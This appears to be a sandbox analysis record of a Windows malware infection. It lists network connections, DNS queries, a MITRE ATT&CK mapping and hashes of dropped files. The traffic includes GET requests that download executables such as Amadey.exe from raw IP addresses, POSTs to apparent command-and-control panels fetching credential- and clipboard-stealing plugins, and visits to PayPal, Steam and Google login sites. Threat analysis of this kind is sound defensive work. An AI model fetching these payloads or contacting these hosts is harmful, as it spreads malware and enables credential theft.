HTTP Request

GET https://www.paypalobjects.com/paypal-ui/logos/svg/paypal-mark-color.svg

HTTP Request

GET https://www.paypalobjects.com/webstatic/i/consumer/onboarding/sprite_form_2x.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.paypalobjects.com/paypal-ui/fonts/PayPalSansBig-Medium.woff2

HTTP Response

200
192.229.221.25:443

www.paypalobjects.com

tls, http2

MicrosoftEdgeCP.exe

1.4kB
8.7kB
19
16
77.91.68.29:80

http://77.91.68.29/fks/

http

1.6kB
1.2kB
10
9

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
142.251.36.54:443

i.ytimg.com

tls, http2

MicrosoftEdgeCP.exe

1.0kB
5.5kB
14
10
142.251.36.54:443

https://i.ytimg.com/generate_204

tls, http2

MicrosoftEdgeCP.exe

1.4kB
5.7kB
16
12

HTTP Request

GET https://i.ytimg.com/generate_204

HTTP Response

204
194.169.175.118:80

http://194.169.175.118/trafico.exe

http

10.8kB
527.0kB
219
382

HTTP Request

GET http://194.169.175.118/trafico.exe

HTTP Response

200
77.91.68.29:80

http://77.91.68.29/fks/

http

9.6kB
104.7kB
95
93

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
171.22.28.213:80

http://171.22.28.213/1.exe

http

7.1kB
399.3kB
151
290

HTTP Request

GET http://171.22.28.213/1.exe

HTTP Response

200
148.251.234.93:443

iplogger.com

tls

825 B
6.1kB
9
11
188.114.96.0:80

http://stim.graspalace.com/order/tuc19.exe

http

95.9kB
5.8MB
2083
4149

HTTP Request

GET http://stim.graspalace.com/order/tuc19.exe

HTTP Response

200
185.196.9.171:80

http://185.196.9.171/Amadey.exe

http

6.0kB
323.6kB
127
235

HTTP Request

GET http://185.196.9.171/Amadey.exe

HTTP Response

200
194.49.94.11:80

http://194.49.94.11/

http

7.9MB
42.2kB
5647
898

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200
77.91.124.86:19084

156 B
3
77.91.124.86:19084

156 B
3
151.101.1.35:443

t.paypal.com

tls

1.8kB
5.8kB
16
15
151.101.1.35:443

t.paypal.com

tls

1.0kB
4.9kB
14
13
167.235.20.126:80

http://167.235.20.126/bjdm32DP/Plugins/clip64.dll

http

593.4kB
1.8MB
11539
8067

HTTP Request

POST http://167.235.20.126/bjdm32DP/index.php?scr=1

HTTP Response

200

HTTP Request

GET http://167.235.20.126/bjdm32DP/Plugins/cred64.dll

HTTP Response

200

HTTP Request

GET http://167.235.20.126/bjdm32DP/Plugins/clip64.dll

HTTP Response

200
167.235.20.126:80

http://167.235.20.126/bjdm32DP/index.php

http

784 B
637 B
7
6

HTTP Request

POST http://167.235.20.126/bjdm32DP/index.php

HTTP Response

200

HTTP Request

POST http://167.235.20.126/bjdm32DP/index.php

HTTP Response

200
104.26.13.31:443

api.ip.sb

tls

811 B
5.7kB
10
8
192.229.221.25:443

www.paypalobjects.com

tls

1.7kB
10.6kB
21
16
192.229.221.25:443

www.paypalobjects.com

tls

1.4kB
8.8kB
19
17
157.240.5.10:443

static.xx.fbcdn.net

tls

1.2kB
4.0kB
16
13
157.240.5.10:443

static.xx.fbcdn.net

tls

1.6kB
5.9kB
20
16
20.189.173.20:443

watson.telemetry.microsoft.com

tls

8.3kB
6.1kB
14
11
104.85.0.101:443

store.steampowered.com

tls

891 B
4.3kB
12
9
104.85.0.101:443

store.steampowered.com

tls

2.5kB
44.4kB
40
38
18.239.36.73:443

static-assets-prod.unrealengine.com

tls

1.5kB
12.9kB
19
16
18.239.36.73:443

static-assets-prod.unrealengine.com

tls

1.0kB
6.6kB
13
11
23.207.106.113:443

steamcommunity.com

tls

2.5kB
44.6kB
41
39
23.207.106.113:443

steamcommunity.com

tls

887 B
4.5kB
12
9
142.250.179.163:443

www.recaptcha.net

tls

1.1kB
11.7kB
16
15
142.250.179.163:443

www.recaptcha.net

tls

941 B
11.6kB
14
13
151.101.1.21:443

c.paypal.com

tls

1.1kB
7.2kB
16
15
151.101.1.21:443

c.paypal.com

tls

13.9kB
58.6kB
69
63
142.250.179.163:443

www.recaptcha.net

tls

18.7kB
74.5kB
91
85
142.250.179.163:443

www.recaptcha.net

tls

1.3kB
12.1kB
19
16
192.55.233.1:443

160 B
3
192.55.233.1:443

160 B
3
77.91.124.86:19084

156 B
3
77.91.124.86:19084

156 B
3
23.207.106.113:443

api.steampowered.com

tls

9.4kB
5.1kB
19
15
23.207.106.113:443

api.steampowered.com

tls

1.1kB
4.8kB
14
13
167.235.20.126:80

http://167.235.20.126/bjdm32DP/index.php

http

387 B
395 B
5
4

HTTP Request

POST http://167.235.20.126/bjdm32DP/index.php

HTTP Response

200
167.235.20.126:80

http://167.235.20.126/bjdm32DP/index.php

http

404 B
345 B
5
3

HTTP Request

POST http://167.235.20.126/bjdm32DP/index.php

HTTP Response

200
64.4.245.84:443

b.stats.paypal.com

tls

2.0kB
4.9kB
12
8
64.4.245.84:443

b.stats.paypal.com

tls

936 B
4.6kB
13
8
192.55.233.1:443

160 B
3
192.55.233.1:443

160 B
3
172.64.146.120:443

talon-website-prod.ecosec.on.epicgames.com

tls

987 B
3.6kB
12
9
172.64.146.120:443

talon-website-prod.ecosec.on.epicgames.com

tls

12.1kB
326.5kB
246
242
64.4.245.84:443

dub.stats.paypal.com

tls

2.0kB
4.7kB
12
9
64.4.245.84:443

dub.stats.paypal.com

tls

800 B
4.2kB
10
5
23.207.106.113:443

api.steampowered.com

tls

6.0kB
5.5kB
22
21
23.207.106.113:443

api.steampowered.com

tls

1.1kB
4.8kB
14
13
151.101.1.35:443

c6.paypal.com

tls

1.7kB
6.8kB
14
13
151.101.1.35:443

c6.paypal.com

tls

958 B
6.2kB
12
11
172.64.146.120:443

talon-service-prod.ecosec.on.epicgames.com

tls

4.9kB
6.3kB
35
28
172.64.146.120:443

talon-service-prod.ecosec.on.epicgames.com

tls

955 B
3.6kB
11
9
104.19.219.90:443

js.hcaptcha.com

tls

960 B
3.6kB
12
9
104.19.219.90:443

js.hcaptcha.com

tls

5.7kB
102.7kB
109
105
104.19.218.90:443

newassets.hcaptcha.com

tls

967 B
3.6kB
12
9
104.19.218.90:443

newassets.hcaptcha.com

tls

16.4kB
379.0kB
336
329
95.214.26.28:80

http://host-host-file8.com/

http

731 B
402 B
6
5

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
104.19.218.90:443

hcaptcha.com

tls

925 B
3.6kB
11
9
104.19.218.90:443

hcaptcha.com

tls

1.4kB
4.7kB
14
12
77.91.124.86:19084

156 B
3
77.91.124.86:19084

156 B
3
142.251.36.45:443

accounts.google.com

tls

1.0kB
5.1kB
13
10
142.251.36.45:443

accounts.google.com

tls

5.5kB
120.1kB
99
96
142.251.36.54:443

i.ytimg.com

tls

1.0kB
5.5kB
13
10
142.251.36.54:443

i.ytimg.com

tls

1.4kB
5.7kB
16
11
204.79.197.200:443

ieonline.microsoft.com

tls

1.2kB
8.3kB
15
14
204.79.197.200:443

ieonline.microsoft.com

tls

8.8kB
187.6kB
164
162
20.189.173.20:443

watson.telemetry.microsoft.com

tls

7.0kB
6.2kB
16
13
142.251.36.54:443

i.ytimg.com

tls

1.4kB
5.6kB
15
10
142.251.36.54:443

i.ytimg.com

tls

1.0kB
5.5kB
13
11
142.251.36.45:443

accounts.google.com

tls

5.5kB
119.3kB
98
95
142.251.36.45:443

accounts.google.com

tls

1.0kB
5.1kB
13
10
77.91.124.86:19084

156 B
3
77.91.124.86:19084

156 B
3
20.189.173.22:443

watson.telemetry.microsoft.com

tls

8.3kB
6.1kB
14
11
142.251.36.45:443

accounts.google.com

tls

1.0kB
5.1kB
13
10
142.251.36.45:443

accounts.google.com

tls

5.5kB
119.5kB
99
96
142.251.36.45:443

accounts.google.com

tls

1.5kB
6.6kB
18
17
142.251.36.45:443

accounts.google.com

tls

968 B
5.1kB
12
10
20.189.173.22:443

watson.telemetry.microsoft.com

tls

6.9kB
6.0kB
13
10

8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

dns

118 B
182 B
1
1

DNS Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
8.8.8.8:53

249.68.91.77.in-addr.arpa

dns

71 B
108 B
1
1

DNS Request

249.68.91.77.in-addr.arpa
8.8.8.8:53

73.255.233.193.in-addr.arpa

dns

73 B
110 B
1
1

DNS Request

73.255.233.193.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

MicrosoftEdgeCP.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
8.8.8.8:53

177.25.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

177.25.221.88.in-addr.arpa
8.8.8.8:53

www.facebook.com

dns

MicrosoftEdgeCP.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.247.35
8.8.8.8:53

accounts.google.com

dns

MicrosoftEdgeCP.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.251.36.45
8.8.8.8:53

35.247.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.247.240.157.in-addr.arpa
8.8.8.8:53

store.steampowered.com

dns

MicrosoftEdgeCP.exe

68 B
84 B
1
1

DNS Request

store.steampowered.com

DNS Response

104.85.0.101
8.8.8.8:53

twitter.com

dns

MicrosoftEdge.exe

57 B
73 B
1
1

DNS Request

twitter.com

DNS Response

104.244.42.129
8.8.8.8:53

121.208.253.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

121.208.253.8.in-addr.arpa
8.8.8.8:53

45.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

45.36.251.142.in-addr.arpa
8.8.8.8:53

35.36.251.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

35.36.251.142.in-addr.arpa
8.8.8.8:53

steamcommunity.com

dns

MicrosoftEdgeCP.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.207.106.113
8.8.8.8:53

www.epicgames.com

dns

MicrosoftEdgeCP.exe

63 B
205 B
1
1

DNS Request

www.epicgames.com

DNS Response

34.198.71.3

54.164.77.27

34.230.126.111

54.175.89.124

3.215.51.251

18.235.28.127

18.213.62.54

18.233.1.119
8.8.8.8:53

static.xx.fbcdn.net

dns

MicrosoftEdgeCP.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.5.10
8.8.8.8:53

www.paypal.com

dns

MicrosoftEdgeCP.exe

60 B
189 B
1
1

DNS Request

www.paypal.com

DNS Response

151.101.1.21

151.101.65.21

151.101.129.21

151.101.193.21
8.8.8.8:53

129.42.244.104.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

129.42.244.104.in-addr.arpa
8.8.8.8:53

101.0.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

101.0.85.104.in-addr.arpa
8.8.8.8:53

10.5.240.157.in-addr.arpa

dns

71 B
115 B
1
1

DNS Request

10.5.240.157.in-addr.arpa
8.8.8.8:53

abs.twimg.com

dns

MicrosoftEdgeCP.exe

59 B
114 B
1
1

DNS Request

abs.twimg.com

DNS Response

152.199.21.141
8.8.8.8:53

store.cloudflare.steamstatic.com

dns

MicrosoftEdgeCP.exe

78 B
110 B
1
1

DNS Request

store.cloudflare.steamstatic.com

DNS Response

104.18.42.105

172.64.145.151
8.8.8.8:53

facebook.com

dns

MicrosoftEdgeCP.exe

132 B
164 B
2
2

DNS Request

facebook.com

DNS Response

157.240.5.35

DNS Request

ocsp.rootca1.amazontrust.com

DNS Response

18.65.41.80
8.8.8.8:53

113.106.207.23.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

113.106.207.23.in-addr.arpa
8.8.8.8:53

141.21.199.152.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

141.21.199.152.in-addr.arpa
8.8.8.8:53

105.42.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

105.42.18.104.in-addr.arpa
8.8.8.8:53

14.214.58.216.in-addr.arpa

dns

72 B
155 B
1
1

DNS Request

14.214.58.216.in-addr.arpa
8.8.8.8:53

35.5.240.157.in-addr.arpa

dns

71 B
124 B
1
1

DNS Request

35.5.240.157.in-addr.arpa
8.8.8.8:53

3.71.198.34.in-addr.arpa

dns

70 B
123 B
1
1

DNS Request

3.71.198.34.in-addr.arpa
8.8.8.8:53

fbcdn.net

dns

MicrosoftEdgeCP.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.5.35
8.8.8.8:53

14.15.239.18.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

14.15.239.18.in-addr.arpa
8.8.8.8:53

21.1.101.151.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

21.1.101.151.in-addr.arpa
8.8.8.8:53

80.41.65.18.in-addr.arpa

dns

70 B
124 B
1
1

DNS Request

80.41.65.18.in-addr.arpa
8.8.8.8:53

ocsp.r2m02.amazontrust.com

dns

MicrosoftEdgeCP.exe

72 B
88 B
1
1

DNS Request

ocsp.r2m02.amazontrust.com

DNS Response

18.238.246.206
8.8.8.8:53

206.246.238.18.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

206.246.238.18.in-addr.arpa
8.8.8.8:53

community.cloudflare.steamstatic.com

dns

MicrosoftEdgeCP.exe

82 B
114 B
1
1

DNS Request

community.cloudflare.steamstatic.com

DNS Response

172.64.145.151

104.18.42.105
8.8.8.8:53

fbsbx.com

dns

MicrosoftEdgeCP.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.5.35
8.8.8.8:53

static-assets-prod.unrealengine.com

dns

MicrosoftEdgeCP.exe

81 B
188 B
1
1

DNS Request

static-assets-prod.unrealengine.com

DNS Response

18.239.36.73

18.239.36.105

18.239.36.22

18.239.36.103
8.8.8.8:53

tracking.epicgames.com

dns

MicrosoftEdgeCP.exe

68 B
186 B
1
1

DNS Request

tracking.epicgames.com

DNS Response

52.6.150.116

54.158.204.155

54.172.4.166
8.8.8.8:53

www.paypalobjects.com

dns

MicrosoftEdgeCP.exe

67 B
148 B
1
1

DNS Request

www.paypalobjects.com

DNS Response

192.229.221.25
8.8.8.8:53

151.145.64.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

151.145.64.172.in-addr.arpa
8.8.8.8:53

73.36.239.18.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

73.36.239.18.in-addr.arpa
8.8.8.8:53

25.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

25.221.229.192.in-addr.arpa
8.8.8.8:53

116.150.6.52.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

116.150.6.52.in-addr.arpa
8.8.8.8:53

i.ytimg.com

dns

MicrosoftEdgeCP.exe

57 B
217 B
1
1

DNS Request

i.ytimg.com

DNS Response

142.251.36.54

172.217.168.246

142.250.179.182

142.250.179.214

142.251.36.22

142.251.39.118

172.217.168.214

172.217.23.214

216.58.208.118

142.250.179.150
8.8.8.8:53

54.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

54.36.251.142.in-addr.arpa
8.8.8.8:53

118.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

118.175.169.194.in-addr.arpa
8.8.8.8:53

106.208.58.216.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

106.208.58.216.in-addr.arpa
8.8.8.8:53

213.28.22.171.in-addr.arpa

dns

72 B
133 B
1
1

DNS Request

213.28.22.171.in-addr.arpa
8.8.8.8:53

iplogger.com

dns

58 B
74 B
1
1

DNS Request

iplogger.com

DNS Response

148.251.234.93
8.8.8.8:53

18.175.53.84.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

18.175.53.84.in-addr.arpa
8.8.8.8:53

stim.graspalace.com

dns

65 B
97 B
1
1

DNS Request

stim.graspalace.com

DNS Response

188.114.96.0

188.114.97.0
8.8.8.8:53

93.234.251.148.in-addr.arpa

dns

73 B
99 B
1
1

DNS Request

93.234.251.148.in-addr.arpa
8.8.8.8:53

0.96.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

0.96.114.188.in-addr.arpa
8.8.8.8:53

171.9.196.185.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

171.9.196.185.in-addr.arpa
8.8.8.8:53

11.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

11.94.49.194.in-addr.arpa
8.8.8.8:53

t.paypal.com

dns

58 B
187 B
1
1

DNS Request

t.paypal.com

DNS Response

151.101.1.35

151.101.65.35

151.101.129.35

151.101.193.35
8.8.8.8:53

35.1.101.151.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

35.1.101.151.in-addr.arpa
8.8.8.8:53

2.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.159.190.20.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.13.31

104.26.12.31

172.67.75.172
8.8.8.8:53

126.20.235.167.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

126.20.235.167.in-addr.arpa
8.8.8.8:53

31.13.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.13.26.104.in-addr.arpa
8.8.8.8:53

watson.telemetry.microsoft.com

dns

76 B
204 B
1
1

DNS Request

watson.telemetry.microsoft.com

DNS Response

20.189.173.20
8.8.8.8:53

20.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

20.173.189.20.in-addr.arpa
8.8.8.8:53

store.steampowered.com

dns

MicrosoftEdgeCP.exe

68 B
84 B
1
1

DNS Request

store.steampowered.com

DNS Response

104.85.0.101
8.8.8.8:53

steamcommunity.com

dns

MicrosoftEdgeCP.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.207.106.113
8.8.8.8:53

www.recaptcha.net

dns

63 B
79 B
1
1

DNS Request

www.recaptcha.net

DNS Response

142.250.179.163
8.8.8.8:53

c.paypal.com

dns

58 B
187 B
1
1

DNS Request

c.paypal.com

DNS Response

151.101.1.21

151.101.65.21

151.101.129.21

151.101.193.21
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

api.steampowered.com

dns

66 B
82 B
1
1

DNS Request

api.steampowered.com

DNS Response

23.207.106.113
8.8.8.8:53

b.stats.paypal.com

dns

64 B
104 B
1
1

DNS Request

b.stats.paypal.com

DNS Response

64.4.245.84
8.8.8.8:53

84.245.4.64.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

84.245.4.64.in-addr.arpa
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

talon-website-prod.ecosec.on.epicgames.com

dns

164 B
399 B
2
2

DNS Request

talon-website-prod.ecosec.on.epicgames.com

DNS Response

172.64.146.120

104.18.41.136

DNS Request

watson.telemetry.microsoft.com

DNS Response

20.189.173.20
8.8.8.8:53

120.146.64.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

120.146.64.172.in-addr.arpa
8.8.8.8:53

dub.stats.paypal.com

dns

66 B
82 B
1
1

DNS Request

dub.stats.paypal.com

DNS Response

64.4.245.84
8.8.8.8:53

c6.paypal.com

dns

59 B
199 B
1
1

DNS Request

c6.paypal.com

DNS Response

151.101.1.35

151.101.65.35

151.101.129.35

151.101.193.35
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
8.8.8.8:53

talon-service-prod.ecosec.on.epicgames.com

dns

88 B
195 B
1
1

DNS Request

talon-service-prod.ecosec.on.epicgames.com

DNS Response

172.64.146.120

104.18.41.136
8.8.8.8:53

js.hcaptcha.com

dns

61 B
93 B
1
1

DNS Request

js.hcaptcha.com

DNS Response

104.19.219.90

104.19.218.90
8.8.8.8:53

90.219.19.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

90.219.19.104.in-addr.arpa
8.8.8.8:53

newassets.hcaptcha.com

dns

68 B
100 B
1
1

DNS Request

newassets.hcaptcha.com

DNS Response

104.19.218.90

104.19.219.90
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

95.214.26.28
8.8.8.8:53

90.218.19.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

90.218.19.104.in-addr.arpa
8.8.8.8:53

161.19.199.152.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

161.19.199.152.in-addr.arpa
8.8.8.8:53

28.26.214.95.in-addr.arpa

dns

71 B
132 B
1
1

DNS Request

28.26.214.95.in-addr.arpa
8.8.8.8:53

hcaptcha.com

dns

58 B
90 B
1
1

DNS Request

hcaptcha.com

DNS Response

104.19.218.90

104.19.219.90
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

2.173.189.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.173.189.20.in-addr.arpa
8.8.8.8:53

163.252.72.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

163.252.72.23.in-addr.arpa
8.8.8.8:53

i.ytimg.com

dns

MicrosoftEdgeCP.exe

57 B
217 B
1
1

DNS Request

i.ytimg.com

DNS Response

142.251.36.54

172.217.168.246

142.250.179.182

142.250.179.214

142.251.36.22

142.251.39.118

172.217.168.214

172.217.23.214

216.58.208.118

142.250.179.150
8.8.8.8:53

accounts.google.com

dns

MicrosoftEdgeCP.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.251.36.45
8.8.8.8:53

watson.telemetry.microsoft.com

dns

76 B
204 B
1
1

DNS Request

watson.telemetry.microsoft.com

DNS Response

20.189.173.22
8.8.8.8:53

22.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.173.189.20.in-addr.arpa
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.168.217.172.in-addr.arpa
8.8.8.8:53

183.2.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

183.2.85.104.in-addr.arpa
8.8.8.8:53

www.microsoft.com

dns

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

104.85.1.163

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\CoreArchive\CoreArchive.exe

Filesize
4.0MB

MD5
2201dd96559c44b5bcf419182b45800f

SHA1
b16585f3f8e5fc8c405e52f6768ede855272ccc3

SHA256
1318ef1ca3ccb22b793a427a90b18fc65d3a9d1bdb853bbc3ad0e6f2369e8396

SHA512
0f13efce28d18233c41e9dd5d308356f651d32257bf26948d0354dbe8e20f815e5e276c13765308a75db4f164ddd1a07775e1eafef1e104db6e6f48a7e299921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\W67BKC2B\edgecompatviewlist[1].xml

Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\JLDFGBR3\buttons[1].css

Filesize
32KB

MD5
b91ff88510ff1d496714c07ea3f1ea20

SHA1
9c4b0ad541328d67a8cde137df3875d824891e41

SHA256
0be99fd30134de50d457729cebd0e08342777af747caf503108178cb4c375085

SHA512
e82438186bfc3e9ca690af8e099aafbfbc71c9310f9d1c8cb87ffa9e7f0f11f33982c63a2dac95c9b83fef1aaa59178b73212fc76e895d13a1ffbbe3c1adfa4c

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\JUXIC3T7\chunk~9229560c0[1].css

Filesize
34KB

MD5
19a9c503e4f9eabd0eafd6773ab082c0

SHA1
d9b0ca3905ab9a0f9ea976d32a00abb7935d9913

SHA256
7ba0cc7d66172829eef8ff773c1e9c6e2fde3cfd82d9a89e1a71751957e47b0a

SHA512
0145582e8eb3adb98ad2dbc0b8e7a29c1d0525f0fd515fcf82eda7b4ce2f7f7f6aa0e81912aa98927e6d420ed110eb497c287a0ad483f8af067332920d4bde83

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\JUXIC3T7\recaptcha__en[1].js

Filesize
461KB

MD5
4efc45f285352a5b252b651160e1ced9

SHA1
c7ba19e7058ec22c8d0f7283ab6b722bb7a135d7

SHA256
253627a82794506a7d660ee232c06a88d2eaafb6174532f8c390bb69ade6636a

SHA512
cfc7aae449b15a8b84f117844547f7a5c2f2dd4a79e8b543305ae83b79195c5a6f6d0ccf6f2888c665002b125d9569cd5c0842fdd2f61d2a2848091776263a39

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\JUXIC3T7\shared_global[1].css

Filesize
84KB

MD5
15dd9a8ffcda0554150891ba63d20d76

SHA1
bdb7de4df9a42a684fa2671516c10a5995668f85

SHA256
6f42b906118e3b3aebcc1a31c162520c95e3b649146a02efd3a0fd8fcddebb21

SHA512
2ceeb8b83590fc35e83576fe8058ddf0e7a942960b0564e9867b45677c665ac20e19c25a7a6a8d5115b60ab33b80104ea492e872cc784b424b105cc049b217e9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\UHXKG991\shared_global[2].js

Filesize
149KB

MD5
dcf6f57f660ba7bf3c0de14c2f66174d

SHA1
ce084fcb16eec54ad5c4869a5d0d0c2afb4ba355

SHA256
7631736851bd8c45de3fc558156213fca631f221507ca5b48893dbe89ed3448e

SHA512
801dedc67ed9f7e0828f4340d228e26d5af32b288dc66d0a3e8d9f94f46e4b64e93b01f319a6de50fa83b2690220d07815e458a4d9941dc0099cbe45529fd86b

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\UHXKG991\shared_responsive[1].css

Filesize
18KB

MD5
2ab2918d06c27cd874de4857d3558626

SHA1
363be3b96ec2d4430f6d578168c68286cb54b465

SHA256
4afb3e37bfdd549cc16ef5321faf3f0a3bf6e84c79fc4408bc6f157280636453

SHA512
3af59e0b16ef9d39c2f1c5ccdbd5c9ea35bd78571fde1b5bf01e51a675d5554e03225a2d7c04ed67e22569e9f43b16788105a0bf591ebba28ef917c961cc59e2

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\UHXKG991\shared_responsive_adapter[1].js

Filesize
24KB

MD5
a52bc800ab6e9df5a05a5153eea29ffb

SHA1
8661643fcbc7498dd7317d100ec62d1c1c6886ff

SHA256
57cfaf9b92c98541f769090cd0229a30013cea7cfafc18519ca654bfae29e14e

SHA512
1bcacd0ec7c3d633d6296fff3325802d6352805f0d2cf1eea39237424229ecffad6cb2aee4248e28b1eca02ff0646b58240851a246bbcf0aa1083830d5d9081e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\UHXKG991\tooltip[2].js

Filesize
15KB

MD5
72938851e7c2ef7b63299eba0c6752cb

SHA1
b75196bd3a6f9f4dfc1bbf5e43e96874bcd9ce4e

